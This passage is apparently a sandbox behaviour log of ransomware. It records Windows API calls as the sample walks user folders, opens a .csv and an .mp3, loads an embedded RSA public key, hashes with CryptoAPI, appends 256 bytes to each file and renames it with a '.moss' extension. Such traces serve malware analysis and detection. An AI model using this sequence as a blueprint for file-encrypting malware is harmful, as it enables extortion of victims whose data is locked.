[0172.368] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x139be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.368] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.368] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Otj_8mdOmWLxIfCj.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\otj_8mdomwlxifcj.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Otj_8mdOmWLxIfCj.csv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\otj_8mdomwlxifcj.csv.moss")) returned 1 [0172.370] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46128 | out: hHeap=0xcd0000) returned 1 [0172.370] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46128 [0172.370] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.370] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.371] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.374] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.374] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\") returned="9yc_4THt2yLG_luCDjCt\\" [0172.374] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\") returned="D99YKJDL-0LajD\\" [0172.374] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0172.374] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.375] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.375] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.375] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.375] PathFindFileNameW (pszPath="") returned="" [0172.375] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x864690e0, ftCreationTime.dwHighDateTime=0x1d5e3f2, ftLastAccessTime.dwLowDateTime=0x5eef0d00, ftLastAccessTime.dwHighDateTime=0x1d5de12, ftLastWriteTime.dwLowDateTime=0x5eef0d00, ftLastWriteTime.dwHighDateTime=0x1d5de12, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.375] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.375] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x864690e0, ftCreationTime.dwHighDateTime=0x1d5e3f2, ftLastAccessTime.dwLowDateTime=0x5eef0d00, ftLastAccessTime.dwHighDateTime=0x1d5de12, ftLastWriteTime.dwLowDateTime=0x5eef0d00, ftLastWriteTime.dwHighDateTime=0x1d5de12, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.375] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac9944c0, ftCreationTime.dwHighDateTime=0x1d5db75, ftLastAccessTime.dwLowDateTime=0xe2494280, ftLastAccessTime.dwHighDateTime=0x1d5e121, ftLastWriteTime.dwLowDateTime=0xe2494280, ftLastWriteTime.dwHighDateTime=0x1d5e121, nFileSizeHigh=0x0, nFileSizeLow=0x9fed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5RpvrOU_FL1tbaCm.mp3", cAlternateFileName="5RPVRO~1.MP3")) returned 1 [0172.375] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\5RpvrOU_FL1tbaCm.mp3") returned=".mp3" [0172.375] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\9yc_4THt2yLG_luCDjCt\\5RpvrOU_FL1tbaCm.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\9yc_4tht2ylg_lucdjct\\5rpvrou_fl1tbacm.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.375] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=40941) returned 1 [0172.376] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.379] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9fc7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.379] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.379] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x9fed, lpOverlapped=0x0) returned 1 [0172.380] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.380] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.381] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.381] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.381] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.381] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.381] GetLastError () returned 0x0 [0172.381] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.381] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.381] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.381] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.381] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.381] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.382] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9fed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.382] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.382] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.387] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS 